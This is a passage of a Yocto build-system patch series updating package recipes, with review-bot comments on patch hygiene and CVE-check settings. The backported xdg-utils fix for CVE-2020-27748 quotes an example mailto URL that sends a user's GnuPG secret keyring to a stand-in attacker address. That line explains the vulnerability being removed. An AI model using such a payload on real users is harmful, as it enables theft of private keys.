b/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb 
@@ -7,7 +7,6 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \ file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ - file://no_daddr_t.patch \ " SRC_URI[sha256sum] = "af7779aee38e6d94726ed7d5cf36384a64d50c86e42fff89c141d8609913f425" @@ -24,4 +23,3 @@ do_install() { oe_runmake DESTDIR=${D} install ln -s stress-ng ${D}${bindir}/stress } - diff --git a/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb b/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb index 5dfeca5326..01a079f041 100644 --- a/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb +++ b/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \ inherit update-rc.d update-alternatives systemd autotools -SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ +SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \ file://sysklogd \ " diff --git a/meta/recipes-extended/tar/tar_1.34.bb b/meta/recipes-extended/tar/tar_1.34.bb index af04919c41..f41e5b33d4 100644 --- a/meta/recipes-extended/tar/tar_1.34.bb +++ b/meta/recipes-extended/tar/tar_1.34.bb @@ -61,3 +61,7 @@ PROVIDES_append_class-native = " tar-replacement-native" NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" BBCLASSEXTEND = "native nativesdk" + +# These are both specific to the NPM package node-tar +CVE_CHECK_WHITELIST += "CVE-2021-32803 CVE-2021-32804" +CVE_CHECK_WHITELIST += "CVE-2021-37701 CVE-2021-37712 CVE-2021-37713" diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc index a89560b424..5c19e9a7f4 100644 --- a/meta/recipes-extended/timezone/timezone.inc +++ b/meta/recipes-extended/timezone/timezone.inc 
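Review bot: The comment added above the new `CVE_CHECK_WHITELIST` lines in tar_1.34.bb says "both", but the two lines that follow suppress five CVE identifiers. Each whitelist entry hides a finding from the CVE checker, so the comment should cover every identifier it justifies, for example `# These are all specific to the NPM package node-tar, not GNU tar`. A reader auditing the list later then does not have to re-check which of the five the justification was meant for.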
@@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "PD & BSD & BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" -PV = "2021a" +PV = "2021d" SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ @@ -14,5 +14,6 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" -SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" -SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" +SRC_URI[tzcode.sha256sum] = "ed0d02be79b54f4449ba1f239aeaf9315da490bf32f401d302dcbba4921f591d" +SRC_URI[tzdata.sha256sum] = "d7c188a2b33d4a3c25ee4a9fdc68c1ff462bfdb302cf41343d84ca5942dbddf6" + diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch 
@@ -0,0 +1,58 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim <joerg@thalheim.io> +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +Upstream-Status: Backport +CVE: CVE-2020-27748 + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + 
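Review bot: In the new xdg-utils patch file, `Upstream-Status: Backport` and `CVE: CVE-2020-27748` sit after the `---` diffstat separator, and the Backport tag gives no upstream reference. Text in that position is not part of the commit message and would be dropped if the patch were applied with `git am`. The tags belong above `---`, next to the Signed-off-by line, as `Upstream-Status: Backport [<upstream commit URL>]` followed by `CVE: CVE-2020-27748`. The file is also named after a bare commit hash, while the other CVE fixes in this series are named after the CVE (CVE-2021-36370.patch, CVE-2021-38185.patch); a matching name would make the fix easier to find in an audit. Only `run_thunderbird` is changed here, and the rest of xdg-email.in is outside the hunk.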
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..41b74b8598 100644 --- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb @@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ file://0001-Reinstate-xdg-terminal.patch \ file://0001-Don-t-build-the-in-script-manual.patch \ + file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ " SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb index 69d5b2f83b..c6d356d227 100644 --- a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb +++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=55c5fdf02cfcca3fc9621b6f2ceae10f" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)" -SRC_URI = "git://github.com/openSUSE/xinetd.git;protocol=https \ +SRC_URI = "git://github.com/openSUSE/xinetd.git;protocol=https;branch=master \ file://xinetd.init \ file://xinetd.default \ file://xinetd.service \ diff --git a/meta/recipes-extended/zip/zip-3.0/0001-configure-use-correct-CPP.patch b/meta/recipes-extended/zip/zip-3.0/0001-configure-use-correct-CPP.patch new file mode 100644 index 0000000000..02253f968c --- /dev/null +++ b/meta/recipes-extended/zip/zip-3.0/0001-configure-use-correct-CPP.patch 
@@ -0,0 +1,47 @@ +From 7a2729ee7f5d9b9d4a0d9b83fe641a2ab03c4ee0 Mon Sep 17 00:00:00 2001 +From: Joe Slater <joe.slater@windriver.com> +Date: Thu, 24 Feb 2022 17:36:59 -0800 +Subject: [PATCH 1/2] configure: use correct CPP + +configure uses CPP to test that two assembler routines +can be built. Unfortunately, it will use /usr/bin/cpp +if it exists, invalidating the tests. We use the $CC +passed to configure. + +Upstream-Status: Inappropriate [openembedded specific] + +Signed-off-by: Joe Slater <joe.slater@windriver.com> +--- + unix/configure | 15 +++++++++------ + 1 file changed, 9 insertions(+), 6 deletions(-) + +diff --git a/unix/configure b/unix/configure +index 73ba803..7e21070 100644 +--- a/unix/configure ++++ b/unix/configure +@@ -220,13 +220,16 @@ fi + echo Check for the C preprocessor + # on SVR4, cc -E does not produce correct assembler files. Need /lib/cpp. + CPP="${CC} -E" ++ ++# We should not change CPP for yocto builds. ++# + # solaris as(1) needs -P, maybe others as well ? +-[ -f /usr/ccs/lib/cpp ] && CPP="/usr/ccs/lib/cpp -P" +-[ -f /usr/lib/cpp ] && CPP=/usr/lib/cpp +-[ -f /lib/cpp ] && CPP=/lib/cpp +-[ -f /usr/bin/cpp ] && CPP=/usr/bin/cpp +-[ -f /xenix ] && CPP="${CC} -E" +-[ -f /lynx.os ] && CPP="${CC} -E" ++# [ -f /usr/ccs/lib/cpp ] && CPP="/usr/ccs/lib/cpp -P" ++# [ -f /usr/lib/cpp ] && CPP=/usr/lib/cpp ++# [ -f /lib/cpp ] && CPP=/lib/cpp ++# [ -f /usr/bin/cpp ] && CPP=/usr/bin/cpp ++# [ -f /xenix ] && CPP="${CC} -E" ++# [ -f /lynx.os ] && CPP="${CC} -E" + + echo "#include <stdio.h>" > conftest.c + $CPP conftest.c >/dev/null 2>/dev/null || CPP="${CC} -E" +-- +2.24.1 + diff --git a/meta/recipes-extended/zip/zip-3.0/0002-configure-support-PIC-code-build.patch b/meta/recipes-extended/zip/zip-3.0/0002-configure-support-PIC-code-build.patch new file mode 100644 index 0000000000..6e0879616a --- /dev/null +++ b/meta/recipes-extended/zip/zip-3.0/0002-configure-support-PIC-code-build.patch 
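Review bot: The inner hunk of 0001-configure-use-correct-CPP.patch disables the six host-path probes by commenting them out, which orphans the `# solaris as(1) needs -P` comment and makes the later `|| CPP="${CC} -E"` fallback redundant. Deleting the six `[ -f ... ] && CPP=...` lines and keeping one explanatory comment, e.g. `# Always use ${CC} -E: a host cpp must not be picked up in a cross build`, would state the intent more clearly than a block of dead code. The same applies to 0002-configure-support-PIC-code-build.patch in the next file section, where `CFLAGS="${CFLAGS} -DASMV"` and `OBJA="match.o"` are commented out inside an `elif` branch. The probe that remains in that branch then appears to serve no purpose, though the branch continues outside the hunk.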
@@ -0,0 +1,34 @@ +From b0492506d2c28581193906e9d260d4f0451e2c39 Mon Sep 17 00:00:00 2001 +From: Joe Slater <joe.slater@windriver.com> +Date: Thu, 24 Feb 2022 17:46:03 -0800 +Subject: [PATCH 2/2] configure: support PIC code build + +Disable building match.S. The code requires +relocation in .text. + +Upstream-Status: Inappropriate [openembedded specific] + +Signed-off-by: Joe Slater <joe.slater@windriver.com> +--- + unix/configure | 5 +++-- + 1 file changed, 3 insertions(+), 2 deletions(-) + +diff --git a/unix/configure b/unix/configure +index 7e21070..1bc698b 100644 +--- a/unix/configure ++++ b/unix/configure +@@ -242,8 +242,9 @@ if eval "$CPP match.S > _match.s 2>/dev/null"; then + if test ! -s _match.s || grep error < _match.s > /dev/null; then + : + elif eval "$CC -c _match.s >/dev/null 2>/dev/null" && [ -f _match.o ]; then +- CFLAGS="${CFLAGS} -DASMV" +- OBJA="match.o" ++ # disable match.S for PIC code ++ # CFLAGS="${CFLAGS} -DASMV" ++ # OBJA="match.o" + echo "int foo() { return 0;}" > conftest.c + $CC -c conftest.c >/dev/null 2>/dev/null + echo Check if compiler generates underlines +-- +2.24.1 + diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb index 18b5d8648e..f8e0b6e259 100644 --- a/meta/recipes-extended/zip/zip_3.0.bb +++ b/meta/recipes-extended/zip/zip_3.0.bb @@ -14,6 +14,8 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/Zip%203.x%20%28latest%29/3.0/zip30.tar. file://fix-security-format.patch \ file://10-remove-build-date.patch \ file://zipnote-crashes-with-segfault.patch \ + file://0001-configure-use-correct-CPP.patch \ + file://0002-configure-support-PIC-code-build.patch \ " UPSTREAM_VERSION_UNKNOWN = "1" diff --git a/meta/recipes-extended/zstd/zstd_1.4.9.bb b/meta/recipes-extended/zstd/zstd_1.4.9.bb index b86fdf8b2d..b648c84093 100644 --- a/meta/recipes-extended/zstd/zstd_1.4.9.bb +++ b/meta/recipes-extended/zstd/zstd_1.4.9.bb 
@@ -9,13 +9,15 @@ LICENSE = "BSD-3-Clause & GPLv2" LIC_FILES_CHKSUM = "file://LICENSE;md5=c7f0b161edbe52f5f345a3d1311d0b32 \ file://COPYING;md5=39bba7d2cf0ba1036f2a6e2be52fe3f0" -SRC_URI = "git://github.com/facebook/zstd.git;branch=release \ +SRC_URI = "git://github.com/facebook/zstd.git;branch=release;protocol=https \ file://0001-Makefile-sort-all-wildcard-file-list-expansions.patch \ " SRCREV = "e4558ffd1dc49399faf4ee5d85abed4386b4dcf5" UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)" +CVE_PRODUCT = "zstandard" + S = "${WORKDIR}/git" PACKAGECONFIG ??= "" |
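Review bot: The new `CVE_PRODUCT = "zstandard"` line in zstd_1.4.9.bb changes which product name the CVE checker matches this recipe against, but nothing in the recipe says why. A one-line comment above it would help, for example `# CVE database entries for zstd use the product name "zstandard"` (wording to be confirmed against the database). If entries exist under the recipe name as well, both names can be listed in the variable so that none are missed.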